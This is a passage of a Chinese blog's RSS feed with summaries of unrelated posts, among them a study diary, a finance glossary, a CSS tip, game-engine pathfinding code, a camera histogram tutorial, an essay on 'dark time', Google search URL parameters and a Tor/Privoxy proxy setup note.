      <description>昨天下定决心开学之前这段时间要好好安排一下每天的工作，不要再天天睡觉了，今天算是第一次实施吧。不过实施效果好像不太理想。与下午相比上午还算充实，像往常一样锻炼完毕之后看了一些闲书上了上网也就到中午了。中午吃晚饭之后由于非常热便打开空调睡了一觉，醒来一看表，靠，又快4点了。赶紧拿出书来好好看了一个小时天也就暗了下来，本打算今天开始写论文的，看来又没戏了。到了晚上本来就没打算干活。明天再说吧，希望明天不要再这么颓废了，要提高一下工作效率了，看来又得开始用番茄工作法了，恶心的番茄钟的声音，不过没有办法啊，离论文的最后日期越来越进啦，更何况想要发两篇。总结这一天呢还是过于懒惰了，虽说内心很想干活但懒惰还是赢了，今天我输了，明天要采用高效一点的工作方式了，不能再堕落下去啦。加油~~~</description>
    </item>
    <item>
      <title>经济金融英语术语汉英对照表</title>
      <link>https://anwangtanmi.github.io/posts/402cb87c822c969d675a8ed11f833c41/</link>
      <pubDate>Mon, 21 Mar 2011 16:39:19 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/402cb87c822c969d675a8ed11f833c41/</guid>
      <description>A 安全网 safety net 按可比口径 on comparable basis 按轻重缓急 to prioritize 暗补 implicit subsidy 暗亏 hidden loss B 颁发营业执照 to license;to grant a licence to 办理存款业务 to take deposits 保护农民的生产积极性 to protect farmers’incentive to produce 备付金（超额准备金） excess reserves 本外币并账 consolidation of domestic and foreign currencyaccounts 本外币对冲操作 sterilization operation 本位利益 localized interest;departmentalism 奔小康 to strive to prosper;to strive to become well-to-do 避税（请见“逃税”） tax avoidance 币种搭配不当 currency mismatch 币种构成 currency composition 变相社会集资 disguised irregular（or illegal） fund raising 表外科目（业务） off-balance-sheet items（operation） 薄弱环节 weaknesses;loopholes 不变成本 fixed cost 不变价 at constant price;in real terms 不动产 real estate 不良贷款（资产） problem loans；non-performing loans（assets）</description>
    </item>
    <item>
      <title>bordercolorlight的CSS实现</title>
      <link>https://anwangtanmi.github.io/posts/a58bc6c2660eb5697290e404ba5d1c56/</link>
      <pubDate>Wed, 29 Sep 2010 11:24:00 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/a58bc6c2660eb5697290e404ba5d1c56/</guid>
      <description>在 IE 中可以对 table 使用 border + bordercolordark + bordercolorlight 来实现表格边框的明暗效果。但要通过对应的 css 样式定义来实现这种效果，并没有直接的相应属性可用（何况这是IE独有属性）。 对于 IE 来说，我们可以用以下方式来美化表格的边框（或许有的人已经根本摒弃了 table 元素的使用。但在我看来， table 在进行数据排列上还是具有 div / span 所无法比拟的优点）：&#xA;&lt;table border=&#34;”1″&#34; bordercolordark=&#34;”#FFFFFF”&#34; bordercolorlight=&#34;”#EBEAEE”&amp;lt;br&#34;&gt; cellpadding=”1″ cellspacing=”0″&amp;gt;&#xA;&lt;tbody&gt;&lt;tr bgcolor=&#34;”#EEEEEE”&#34;&gt;&#xA;&lt;td&gt;www.&lt;/td&gt;&lt;td&gt;zeali.&lt;/td&gt;&lt;td&gt;net&lt;/td&gt;&#xA;&lt;/tr&gt;&#xA;&lt;tr bgcolor=&#34;”#DADADA”&#34;&gt;&#xA;&lt;td&gt;www.&lt;/td&gt;&lt;td&gt;zeali.&lt;/td&gt;&lt;td&gt;net&lt;/td&gt;&#xA;&lt;/tr&gt;&lt;/tbody&gt;&#xA;但可惜，这样的写法只能在 IE 下看到效果，并且无法方便的针对单个页面来进行个性化的样式定制。所以首先我们需要把这部分代码改成 css 样式定义，以便于以后的维护修改。&#xA;据说可以使用 IE 特有的 css 样式属性来进行对应：&#xA;&lt;style type=&#34;”text/css”&#34;&gt;&lt;!–&#xA;TABLE.colorTest{&#xA;border-width:2px;&#xA;table-border-color-light: rgb(235,234,238);&#xA;table-border-color-dark: rgb(255,255,255);&#xA;}&#xA;–&amp;gt;&#xA;cellpadding=”1″ cellspacing=”0″&amp;gt;&#xA;www.zeali.net&#xA;www.zeali.net&#xA;但似乎 table-border-color-light 属性并没有起作用，至少在我的 IE6 下面无效，可能只是某些 IE 版本下的语法。</description>
    </item>
    <item>
      <title>好杯具，Tor昨天刚刚弄好今天就又找不到网络了</title>
      <link>https://anwangtanmi.github.io/posts/94a5670c3c31b89ca92be9b301e88f8f/</link>
      <pubDate>Thu, 02 Sep 2010 22:56:08 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/94a5670c3c31b89ca92be9b301e88f8f/</guid>
      <description>昨天用得好好Tor回来又连接不上网络了，重新找了几个brige也还是连接不上，不指望了。换了free gate。又可以去到外面的世界了。&#xA;使用和tor差不多，需要在autoproxy中将代理换成free gate。作为一个良民，偶只是想上上twitter玩玩</description>
    </item>
    <item>
      <title>KongfuPandaGameEngine编写日记–2010年8月8日0点49分</title>
      <link>https://anwangtanmi.github.io/posts/64d102309beaf075a73ca59380c4630f/</link>
      <pubDate>Sun, 08 Aug 2010 01:09:00 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/64d102309beaf075a73ca59380c4630f/</guid>
      <description>刚刚才修改完我这个引擎，发现了很多的东西，还是学到了很多的东西，呵呵，本来觉得我写这个东西是在自己和自己说话，居然还有人会看看，还给我提出了一些看法，我觉得很高兴啊，网络就是好啊，这样才能进步啊，毕竟我不能和物理组那位老师相比，所以很希望得到大家的指导，在此很感谢 暗影吉他手 说说今天喃，发现还是做了不少的东西，改了一下，我那简陋得不能再简陋的寻路系统了，先贴下代码：&#xA;/// /// 很简单的寻路系统，只是做直线的寻路，返回一步的方向和移动位置&#xA;/// public class StraightLineSearchWay:SearchWayBase&#xA;{&#xA;public StraightLineSearchWay(){}&#xA;public static ModelStep SearchWay(Vector3 pickPos,&#xA;ModelControlBase modelControl)&#xA;{&#xA;Vector3 modelPos = modelControl.WorldPostion;&#xA;Vector3 modelForwardDirection = pickPos – modelPos;&#xA;Vector3 modelCurrentDirection = Vector3.Transform(&#xA;modelControl.modelOriginalDirection,&#xA;modelControl.ModelRotation);&#xA;//运用向量点积得到两个向量的夹角&#xA;float cos =&#xA;Vector3.Dot(modelCurrentDirection, modelForwardDirection) /&#xA;(modelForwardDirection.Length() * modelCurrentDirection.Length());&#xA;//上面计算了旋转的角度，然后要计算旋转的方向，是左边还是右边&#xA;//因为cos的函数值只能得到180的旋转，所以这很重要&#xA;//这里我用到的叉积&#xA;Vector3 dir =&#xA;Vector3.Cross(modelCurrentDirection,modelForwardDirection);&#xA;//方向在左边的话返回-1，方向在右边的话返回1（这个地方可能出错，我记不太清）&#xA;//这样就方便的了后面的四元数计算，因为发现用四元数旋转是逆时针旋转&#xA;float sign = (Vector3.Dot(&#xA;dir, new Vector3(0, 1, 0)) &amp;gt; 0 ? 1 : -1);</description>
    </item>
    <item>
      <title>单反拍摄技巧:利用直方图曝光</title>
      <link>https://anwangtanmi.github.io/posts/00778293f5d55bc6a145f73448c6e4db/</link>
      <pubDate>Tue, 27 Jul 2010 20:01:00 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/00778293f5d55bc6a145f73448c6e4db/</guid>
      <description>曝光补偿的概念已被越来越多的摄友们所认识，但却常常因为不知道该增加或者减少多少曝光量而苦恼？ 就算你已经学会了使用包围曝光，也知道了“亮加暗减”的原则，并在实践中已经使用，但判断的依据是什么？判断的依据就是你相机里的直方图。&#xA;一、用什么来判断曝光？ 答案是——直方图。&#xA;直方图的横坐标代表像素的亮度，左暗右亮。很多相机厂商将直方图从左到右分成“很暗”、“较暗”、“较亮”、“很亮”四个区域，也有的相机厂商将直方图分为五个区域。这些分区与直方图本身并没有关系，也不会影响到直方图的形成。无论四个分区还是五个分区，它们不过是为了观看方便而已。我们可以把“较暗”和“较亮”的区域看成中灰影调的区域，把“很暗”看成画面的暗影区，把“很亮”看成画面的高光区。&#xA;图一图二&#xA;纵座标代表像素的数量，直方图越高的地方，这个亮度在画面中占得面积就越大。在上边两张图片中，图1是水中倒影的照片，图2是它的直方图。从直方图上看，照片上大部分影调位于“较亮”和“较暗”的区域中；水中泛白的天空和楼房的受光面位于直方图的“很亮”区域；而倒影中的深色树枝和左上角的黑影则位于直方图的“很暗”区域。直方图表示这张照片曝光是正常的。&#xA;二、怎么判断曝光和调整曝光？ 判断胶片的曝光时，我们需要看密度。&#xA;前面我们看到的照片，曝光属于正常。那么，如果减少或增加曝光量会出现什么结果呢？减少曝光量的时候，直方图会向左移动，很可能在直方图最左侧已经超出的边界，左侧的“山根”看不见了，就会曝光不足；增加曝光量的时候，直方图会向右移动，很可能在直方图最右侧已经超出的边界，同样，右侧的“山根”看不见了，就会曝光过度； 记住下面的口诀,你就会轻松地利用直方图判断和调整曝光：&#xA;○ 左边山脚见不到，暗部细节被丢失； ○ 右边山脚见不到，亮部细节被丢失； ○ 两边山脚见不到，加减曝光断分明； ○ 山峰靠右亮区大，山峰靠左暗影多； ○ 山谷如果在中间，中间影调少细节。&#xA;“左边山脚见不到，暗部细节被丢失 ” 顾名思义，直方图的左边看不见末端，也就是“暗影溢出”，这表明景物的暗部细节没有被数码相机完全记录下来，溢出的部分在照片里表现为“死黑”，这些像素的记录值为0 。 图3（左图）左侧的照片就属于这种情况。为了更有力地说明这个问题，曝光的时候有意的减少了1档，致使暗部溢出。 直方图分布于左半边，右半边空出，这说明尚有增加曝光的可能。像这样“左边没头儿”、“右侧空余”的直方图，我们增加曝光量就会使直方图整个向右移动，从而使景物的暗部细节能够记录在数码相机里。这就是“向右曝光”（区分于“向右曝光原则”）。&#xA;右边的照片在评价测光的基础上增加了0.7档，直方图分布基本令人满意。与左边照片相比，向右增加了1.7档曝光。&#xA;“右边山脚见不到，亮部细节被丢失” 直方图的右边看不见末端，也就是“高光溢出”，这表明景物的亮部细节没有被数码相机完全记录下来，溢出的部分在照片里表现为“死白”，这些像素的记录值为255。&#xA;如果你拍摄的照片像图4左边的照片一样，直方图“右边没头儿”、“左侧空余”，那么减少曝光量就会使直方图整个向左移动，从而使景物的亮部细节能够记录在数码相机里。这就是“向左曝光”。图4左边的照片“向左曝光”两档，就可以得到右边的照片。看一看直方图，差别很大。 “ 两边山脚见不到，加减曝光断分明 ”如果直方图的两端都看不见末端，也就是“高光和暗影都溢出”，这表明场景中的光影动态范围大于数码相机所能记录的动态范围。这时候，我们就必须有权衡利弊，根据要表现的主题，找到重点突出的地方。如果要重点表现亮部细节，就舍弃暗部细节，向左减少曝光；如果希望突出暗部细节，那么就舍弃亮部细节，向右增加曝光。&#xA;不过，通常情况下，“晃眼的白色”要比“低沉的黑色”更可能成为视觉干扰。所以，如果没有特殊的理由，如果溢出的高光没有在画面中起到辅助作用。我会建议你向左减少曝光，记住这是在“直方图两边都看不到头”的情况下。&#xA;就像（图5）的两张照片一样，我们对于“取舍”的概念并不只限于选择“曝光过度”还是“曝光不足”。对面光线穿透的灯笼是我们想拍摄的主要对象，那么，我们就把注意力集中在它上面，上毫无细节的天空越少越好。我们并没有进行曝光补偿，但实际上测光的区域发生变化，曝光量也已经变化了。&#xA;三、数码相机的曝光原则 原则一：不溢出原则 这一原则适用于任何数码相机的拍摄。在景物的动态范围大于数码相机所能表现的动态范围时，也就是我们通常说的大光比场景的拍摄，比如夜景拍摄、冰灯拍摄等，你至少应该让一个方向上不溢出。你还可以想办法使光比减小，比如对暗部补光，这样我们的相机就可以记录场景中的等多细节。&#xA;我们总会觉得夜景拍摄要增加曝光时间，甚至要半小时、一小时的曝光。事实上，如果是灯火辉煌城市夜景并不需要这么做。正如你所看到的下边这张外滩夜景的照片（图6），曝光时间是1/15秒，感光度的ISO200，并没有用什么特殊的拍摄手法。&#xA;从直方图上来看，画面中大部分处于“很暗”的区域中。事实也是如此，不然被灯光照亮的“东方明珠”怎么才能突出出来呢？光源的部分有少量的溢出，直接对准光源拍摄总是会这样。但这并不影响到整个画面，因为它们占的面积非常小，而且又节奏的出现在画面中成为点缀。注意建筑主体的曝光，尤其是“球”的下半部分，还有左上方红色三角中的细节。这都说明高光部分的曝光比较合适。再来看看暗部的细节，几乎没有溢出。我们在暗影中还能隐隐约约看到远处高楼大厦的身影。见鬼！也许你会喜欢横着拍，因为很多都市夜景照片都是横着拍的。而且被灯光照亮的天空会让远处暗影中的楼房看起来更加扑朔。&#xA;原则二：亮加黑减 你可能在网络上看到了一些数码相机“向右曝光”的原则。这个原则要求我们在右侧不溢出的情况下尽量向右曝光。这么做的理由是：如果在后期把暗部提亮会产生很多噪点，而后期针对高光部压暗却不存在这个问题。不过，既然你知道煤炭是黑的，为什么还要“过曝”后再把它压暗呢？所以，我更愿意推荐你使用“亮加黑减”的原则。&#xA;当画面中亮的部分占很大面积时，我们需要增加一些曝光，也就是向右曝光：比如拍摄大面积的雪景，你可以适当向右增加曝光，注意不要让高光溢出，并且还要保证雪的纹理和细节；同样，当画面中暗的部分占很大面积时，我们需要减一些曝光，也就是“向左曝光”：比如当你在拍摄大面积的煤炭时，可以适当向左减少曝光，注意不要让暗影溢出，并且还要保证煤炭的纹理和细节。&#xA;左边这张照片（图7）是在侧逆光条件下表现由白雪和阴影构成的起伏和雪的质感。直方图中的两个“山峰”分别代表雪地中高亮部分和阴影部分的分布。可以看出高亮的部分并没有集中在直方图的最右端，而是靠左一点，这样可以很好地表现出雪地的质感。同时，我们看到雪地上的阴影仍然处在直方图的“较亮”区域。&#xA;左边的照片（图８）从直方图上看，右侧还有些余量，也就是说，我们还可以再向右进行曝光。但事实上，我并没有这么做。相反的，我在原有的测光基础上，向左曝光1/3档。这样的曝光可以更好地表向酒坛子上的细节。注意光线的条件是漫射光，之所以选择漫射光条件拍摄，是因为如果在直射光下拍摄，坛子上会留下强烈的阴影。&#xA;结束语 :无论是“不溢出原则”还是“亮加暗减”原则，这一切都建立在一个总原则上，那就是——你要去看懂直方图，并根据拍摄的主题和直方图去调整曝光。现在，拿起你的数码相机，去拍照吧！</description>
    </item>
    <item>
      <title>困扰世界的13大未解之谜</title>
      <link>https://anwangtanmi.github.io/posts/36732dd610e1e37f65228d12b0706be3/</link>
      <pubDate>Fri, 05 Feb 2010 10:58:00 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/36732dd610e1e37f65228d12b0706be3/</guid>
      <description> 近日英国学者马克·布鲁斯罗列出了现代科学界最困惑的13个世界难题，下面我们就来具体看看是那13大难题。　宇宙的绝大部分仍然未知我们只知道4％　也许你正迷惑于大型强子对撞器(LHC)究竟有什么用，或许结论是这样的：科学家希望碰撞能产生一些新的粒子，发现所谓的“暗物质”，一种被认为是占整个宇宙四分之一的组成物质，然后科学界就说存在“暗能量”的神秘力量，这种神奇的力量可能 </description>
    </item>
    <item>
      <title>如何利用“暗时间”</title>
      <link>https://anwangtanmi.github.io/posts/15e0f0499047dd646d87f4e618c124ff/</link>
      <pubDate>Thu, 28 Jan 2010 23:02:00 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/15e0f0499047dd646d87f4e618c124ff/</guid>
      <description>在我没有看到这篇文章之前，有几个困惑：&#xA;如何用一个词来表示什么叫空闲时间？ 时间对于每个人都公平吗？ 为什么有的人可以同事把很多事做得非常优秀？ 我已经知道专注的力量，那在很多事情之间进行切换，又是怎样的一种状态？ 如何避免诱惑，训练集中注意力，提高抗干扰能力？ 来自：刘未鹏 | Mind Hacks（这家伙，惜字如金，常常几个月才写篇博文，却精妙绝伦）&#xA;原文：暗时间&#xA;如果你有一台计算机，你装了一个系统之后就整天把它搁置在那里，你觉得这台计算机被实际使用了吗？没有。因为CPU整天运行的就是空闲进程。运行空闲进程也是一天，运行大数据量计算的程序也是一天，对于CPU来说同样的一天，价值却是完全不一样的。&#xA;大脑也是如此。&#xA;善于利用思维时间的人，可以无形中比别人多出很多时间，从而实际意义上能比别人多活很多年。我们经常听说“心理年龄”这个词，思考得多的人，往往心 理年龄更大。有人用10年才能领悟一个道理，因为他们是被动领悟——只有在现实撞到他脸上的时候才感到疼，疼完了之后还是不记得时时提醒自己，结果很快时 过境迁抛之脑后，等到第二次遇到同一个坑的时候早忘了曾经跌过跟头了，像这样的效率，除非天天摔坑里，否则遗忘的效率总是大过吃亏长的记性。善于利用思维 时间的人则能够在重要的事情上时时主动提醒自己，将临时的记忆变成硬编码的行为习惯。&#xA;每个人的手表都走得一样快，但每个人的生命却不是。衡量一个人生活了多少年，应该用思维时间来计算。举一个极端的例子，如果一个人从生下来开始就呆在一个为他特殊建造的无菌保护室里，没有社会交往，没有知识获取，度过了18年，你会不会认为他成年了？&#xA;认为时间对每个人是均等的是一个错觉，认为别人有一天，我也有一天，其实根本不是这样。如果你正在学习一门专业，你使用自己所投入的天数来衡量，很 容易会产生一种错觉，认为投入了不少时间，然而其实，“投入时间”这个说法本身就是荒唐的，实际投入的是时间和效率的乘积。你可以“投入”很多时间在一件 事情上面，却发现毫无进展，因为你没有整天把你要做的事情，要学习的东西常驻在你的大脑中，时刻给予它最高的优先级。你走路的时候吃饭的时候，做梦的时候 心心念念想的就是这件事情，你的CPU总是分配给它，这个时候你的思维时间就被利用到了极致，你投入的时间就真正等于了实际流逝的时间，因为你的CPU是 满载的。&#xA;如果你有做总结的习惯，你在度过一段时间之后总结自己在某某领域投入了多少时间，建议千万不要粗略地去计算有多少天下班后拿起书来翻看过，因为这样 你也许会发现书倒是常翻，但领悟却不见得多深，表面上花的时间不少，收益却不见得那么大。因为看书并记住书中的东西只是记忆，并没有涉及推理，只有靠推理 才能深入理解一个事物，看到别人看不到的地方，这部分推理的过程就是你的思维时间，也是人一生中占据一个显著比例的“暗时间”，你走路、买菜、洗脸洗手、坐公车、逛街、出游、吃饭、睡觉，所有这些时间都可以成为“暗时间”，你可以充分利用这些时间进行思考，反刍和消化平时看和读的东西，让你的认识能够脱离照本宣科的层面。这段时间看起来微不足道，但日积月累将会产生庞大的效应。&#xA;能够充分利用暗时间的人将无形中多出一大块生命，你也许会发现这样的人似乎玩得不比你少，看得不比你多，但不知怎么的就是比你走得更远。比如我就经常发现一些国外的牛人们为什么不仅学习牛逼，连“业余”玩儿的东东也都搞得特牛逼，一点都不业余（上次在《How We Decide》上看到斯坦福的一个牛人，粒子物理教授，同时是世界扑克大赛的前六名保持者，迄今累计奖金拿了六百多万刀），你会奇怪，这些家伙到底哪来的时间，居然可以在不止一个领域做到卓越？&#xA;程序员们都知道，任务切换需要耗费许多额外的花销，通俗地来讲，首先需要保存当前上下文以便下次能够顺利切换回来，然后要加载目标任务的上下文。如果一个系统不停地在多个任务之间来回倒腾，就会耗费大量的时间在上下文切换上，无形中浪费很多的时间。&#xA;相比之下，如果只做一件任务，就不会有此损失。这就是为什么专注的人比不专注的人时间利用效率高得多的原因。任务切换的暗时间看似非常不明显，甚至很多人认为“多任务”是件很好的事情（有时候的确是），但日积月累起来就会发现，消耗在切换上的时间越来越多。&#xA;另外，大脑开始一件任务的时候必须要有一定时间来“热身”，这个时间因人而异，并且可以通过练习来改变。举个例子，你看了一会书之后，忽然感到一阵 无聊，忍不住打开浏览器，十分钟后你想起来还要继续看书，但要回复到当时理想的状态，却需要一段时间来努力去集中精力，把记忆中相关的知识全都激活起来， 从而才能进入“状态”，因为你上了十分钟网之后这些记忆已经被抑制了。如果这个“热身”状态需要一刻钟，那么看似十分钟的上网闲逛其实就花费了二十五分 钟。&#xA;如果阅读的例子还不够生动，对于程序员来说其实有更好的例子：你写程序写得正high，忽然被叫去开了一通会，写到一半的代码搁在那儿。等你开完会 回来你需要多久能够重新进入状态？又或者，你正在调试程序，你已经花了二十分钟的时间把与这个bug可能相关的代码前前后后都理解了一遍，心中构建了一个 大致的地图，就在这时，呃，你又被叫去开了个会(:D)，开完会回来，可想而知，得花上一些时间来回想一下刚刚弄清的东西了。&#xA;迅速进入状态的能力是可以锻炼的，根据我个人的经验，至少可以缩短到3-5分钟。但要想完全进入状态，却是很难在这么短的时间实现的。所谓完全进入 状态，举个例子：你看了3个小时的书，或者调试了半个小时的程序之后，往往满脑子都是相关的东西，所有这些知识都处在活跃状态，换言之你大脑中所有相关的 记忆神经网络都被激活了，要达到这样一种忘记时间流逝的“沉浸”状态（心理学上叫做“流体验”），不是三两分钟的事情。而一旦这种状态被破坏，无形间效率就会大打折扣。这也是为什么我总是倾向于创造大块的时间来阅读重要的东西，因为这样有利于“沉浸”进去，使得新知识可以和大脑中与其相关的各种既有的知识充分融合，关联起来，后者对于深刻的记忆非常有帮助。&#xA;要充分利用暗时间，不仅要能够迅速进入状态，另一个很重要的习惯就是能够保持状态多久（思维体力）。《The Psychology of Invention in the Mathematical Field》上有一段关于庞加莱的思考习惯的介绍，很有代表性。庞加莱经常在去海边休假或者在路上走的时候在脑海中思索数学问题，很多时候解答就在这些时候忽然闪现。虽然我和庞加莱是没法比的，但是常常也在路上想出答案，这真是一种愉悦的体验。&#xA;能够迅速进入专注状态，以及能够长期保持专注状态，是高效学习的两个最重要习惯。&#xA;很多人都有这样的体验（包括我自己），工作了之后，要处理的事情一下多出了很多，不像在校园，环境简单，生活单纯，能够心无旁骛地做一件事情而不被 打扰。工作之后的状况就是，首先需要处理的事情变多，导致时不时需要在多个任务之间切换；另一方面，即便能够把任务的优先级分配得比较合理，也难免在做一 件事情的时候心中忽然想起另一件事还没做的焦虑来，因为没做完的事情会在大脑中留下一个“隐藏的进程”，时不时地发个消息提醒你一下，中断你正在做的事 情。&#xA;因此这里就涉及到最后一个高效的习惯：抗干扰。只有具备超强的抗干扰能力，才能有效地利用起前面提到的种种暗时间。抗干扰能力也是可以练习出来的， 上本科那会经常坐车，所以我就常常拿着本大部头在车上看，坐着看或者站着看都可，事实证明在有干扰的环境中看书是非常锻炼专注能力的一个办法:D 另外，经常利用各种碎片时间阅读和思考，对迅速集中注意力和保持注意力都非常有帮助。记得很久以前TopLanguage上大伙曾经有次饶有兴趣地讨论“马桶时间”的利用，包括在卫生间放个小书柜。（估计很多同学心有戚戚焉吧:D）&#xA;原文地址：http://www.zreading.cn/archives/1548.html</description>
    </item>
    <item>
      <title>【转】谷歌暗藏实时搜索：修改URL参数即可实现</title>
      <link>https://anwangtanmi.github.io/posts/b206b199ae3f0f159233d417a15ae29b/</link>
      <pubDate>Tue, 15 Sep 2009 09:53:00 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/b206b199ae3f0f159233d417a15ae29b/</guid>
      <description>谷歌暗藏实时搜索：修改URL参数即可实现 http://www.sina.com.cn 2009年09月14日 10:33 新浪科技 导语：国外科技博客今天撰文称，只需在谷歌搜索URL中加入不同的参数，即可对网络过去1分钟、甚至1秒钟的内容进行搜索。&#xA;在谷歌于5月份推出的“搜索选项”中，有一个根据时间来限制搜索结果的功能，用户可以根据默认的“任何时间”、“去年”、“上周”、“最近”或者“过去24小时”进行搜索，但是，这仍与“实时”存在相当大的差距。谷歌没法提供过去1分钟甚至1秒钟内的搜索。但有一个小窍门，可以通过在搜索URL中加入参数，缩短该时间值。&#xA;搜索过去24小时内关于巴拉克·奥巴马(Barack Obama)的内容 例如，搜索过去24小时内关于巴拉克·奥巴马(Barack Obama)的内容：&#xA;http://www.google.com/search?q=barack%20obama&amp;amp;hl=en&amp;amp;output=search&amp;amp;tbs=qdr:d&amp;amp;tbo=1&#xA;请注意其中的参数“qdr:d”，其中的“qdr”是“Query Date Range”(搜索时间范围)的首字母缩写，因此我们将参数改为“qdr:n”尝试对过去一分钟的内容进行搜索，对过去一秒钟内的内容进行搜索则改为“qdr:s”。即：&#xA;过去一分钟的检索结果 过去一分钟：&#xA;http://www.google.com/search?q=barack%20obama&amp;amp;hl=en&amp;amp;output=search&amp;amp;tbs=qdr:n&amp;amp;tbo=1&#xA;过去一秒钟的检索结果，因时间太短，搜索结果为零 过去一秒钟：&#xA;http://www.google.com/search?q=barack%20obama&amp;amp;hl=en&amp;amp;output=search&amp;amp;tbs=qdr:s&amp;amp;tbo=1&#xA;过去一秒钟内没有搜索到任何内容。这并不奇怪，因为时间值太小了，只有1秒钟。&#xA;此外，还可以对过去一小时内的内容进行搜索：&#xA;http://www.google.com/search?q=omgili&amp;amp;hl=en&amp;amp;tbo=1&amp;amp;tbs=qdr:h&#xA;或者对过去10分钟的内容进行搜索：&#xA;http://www.google.com/search?q=barack%20obama&amp;amp;hl=en&amp;amp;output=search&amp;amp;tbs=qdr:n10&amp;amp;tbo=1&#xA;或者对过去30秒的内容进行搜索：&#xA;http://www.google.com/search?q=barack%20obama&amp;amp;hl=en&amp;amp;output=search&amp;amp;tbs=qdr:s30&amp;amp;tbo=1&#xA;其实，只需在时间参数(h代表小时，n代表分钟，s代表秒)后加入数字即可，例如，“qdr:n10”即可返回过去10分钟内的搜索结果。(肖恩)</description>
    </item>
    <item>
      <title>用tor自建的局域网代理服务器</title>
      <link>https://anwangtanmi.github.io/posts/5291a211c1b74d30037d64694b276200/</link>
      <pubDate>Sat, 07 Mar 2009 16:25:26 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/5291a211c1b74d30037d64694b276200/</guid>
      <description>知道了不值一提，记之备忘&#xA;要求很简单，局域网内有些机器不能直接访问互联网，因此用自己的机器中转一下。&#xA;一般安装tor后会带有privoxy，privoxy作为http代理服务器负责将tor提供的scoket5转换成http。 缺省情况下privoxy只负责代理本机的http请求，要想让局域网内其它机器也能使用只要修改一下privoxy的主配置文件（Main Configuration)，将&#xA;listen-address 127.0.0.1:8118&#xA;改成运行privoxy的主机IP即可&#xA;在Ubuntu 9.10 Server下，该配置文件为/etc/privoxy/config&#xA;参考privoxy的FAQ文件&#xA;3.12. How can I set up Privoxy to act as a proxy for my LAN?&#xA;[size=large]我的Ubuntu下tor安装备忘录[/size]&#xA;0。修改DNS&#xA;/etc/resolv.conf&#xA;添加google的两个DNS服务器&#xA;nameserver 8.8.8.8&#xA;nameserver 8.8.4.4&#xA;nameserver 4.2.2.1 [size=medium]1。添加apt源[/size]&#xA;修改/etc/apt/sources.list文件，添加torproject的源：&#xA;deb http://deb.torproject.org/torproject.org main&#xA;为Ubuntu的版本代号，比如9.10是karmic&#xA;不过deb.torproject.org本身也是被那个啥的，有3个替代：&#xA;deb-master.torproject.org&#xA;mirror.netcologne.de&#xA;tor.mirror.youam.de&#xA;[size=medium]2. 信任[/size]&#xA;gpg --keyserver keys.gnupg.net --recv 886DDD89&#xA;gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add - 可惜keys.gnupg.net也是被那个啥的，只好找个代理服务器了，比如局域网内有个翻那个啥的代理服务器10.0.0.47:8118&#xA;gpg --keyserver-options http-proxy=10.0.0.47:8118 --keyserver keys.gnupg.net --recv 886DDD89 [size=medium]3.</description>
    </item>
    <item>
      <title>深度分析：中移动TD上网本暗袭电信宽带市场</title>
      <link>https://anwangtanmi.github.io/posts/e02ff3e872698582fead0ea0bd1c5f53/</link>
      <pubDate>Wed, 04 Mar 2009 22:16:00 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/e02ff3e872698582fead0ea0bd1c5f53/</guid>
      <description>深度分析：中移动TD上网本暗袭电信宽带市场 [2009-2-9 11:24:06]　关键词： 中国联通,西班牙,电信&#xA;www.voipchina.cn 摘 要： 2月9日：自1月7日3G牌照颁发以来，3G市场可谓风雨满楼，移动、联通、电信使尽浑身解数，大力推广各自业务，广告更是做的无所不在。 【网络通信中国讯】2月9日：自1月7日3G牌照颁发以来，3G市场可谓风雨满楼，移动、联通、电信使尽浑身解数，大力推广各自业务，广告更是做的无所不在。而在这一片喧嚣背后，另一场战争也已悄然拉开帷幕，那就是通过发展无线宽带市场，引发对传统固网宽带市场的冲击。&#xA;TD上网本进一步凸显中移动无线宽带战略&#xA;有消息称，中国移动把在笔记本电脑中内置TD-SCDMA上网卡作为TD应用的重要方向，并且对TD终端在上网方面的考虑已初步形成一个名为“3+1”的方案，预计3月出炉。“3”指TD上网卡、内置TD上网卡的笔记本电脑及无线固话三部分，“1”则指拥有上网功能的TD手机。在手机终端方面，移动目前的侧重点也并非单一的TD手机，而是双模手机。&#xA;这一消息给厂商们释放出强烈信号的同时，也进一步昭示了移动的战略意图，电信重组之后，移动、联通、电信三家都把全业务运营商作为发展方向，移动+铁通的组合。因此，走传统宽带的竞争上，无论是固网宽带资源还是用户积累上，远不及联通+网通、电信+CDMA这两个组合。新移动扬长避短，利用自身优势，通过抢占无线宽带市场，来弥补自身固网的不足，同时也将会对电信、网通的传统宽带市场形成一定的冲击。&#xA;其实，从去年开始，中移动的这一战略已经初露端倪。中移动内部人士透露，根据TD试商用情况分析，3G业务中最抢眼的是视频业务，但用户最多使用一两次视频电话就不用了，真正需要的是无线带宽。去年下半年，中移动悄然将主攻方向转向TD上网卡，而手机终端方面却未有大规模集采发生，而从市场实际销售情况看，TD上网卡也远比TD手机终端销售火爆。新年伊始，移动便开始在内置TD上网卡的笔记本上着力，可见其在无线宽带市场方面的决心。&#xA;无线宽带成为全业务运营切入点&#xA;在3G网络建设方面，移动、联通、电信三家在2009年的预期投入都在600亿左右。移动2009年预计投资588亿元，新建TD基站约6万个，此举将使TD网络基站总数超过8万个，覆盖238个地级城市的业务热点区，占全国地级城市数量的70%以上。中国联通预期今年投入600亿元，全年3G服务城市达282个，其中55个城市将于上半年完成。并且对于此次建设的WCDMA网络，联通定位“高质量”，强调 “以移动数据为核心，建立3G移动宽带领先的优势”。而电信早在3G牌照尚未颁发之时，已经表现出比前两者更大的热情，声称要投入800亿。&#xA;如此巨大的投入，加上全业务竞争的压力，只怕不是简单一个视频业务所能支撑的，不管手机看视频还是手机视频通话，距离成为市场主流都还有相当长的路要走，反倒是无线宽带早已成为固网宽带的延伸，并以“随时、随地” 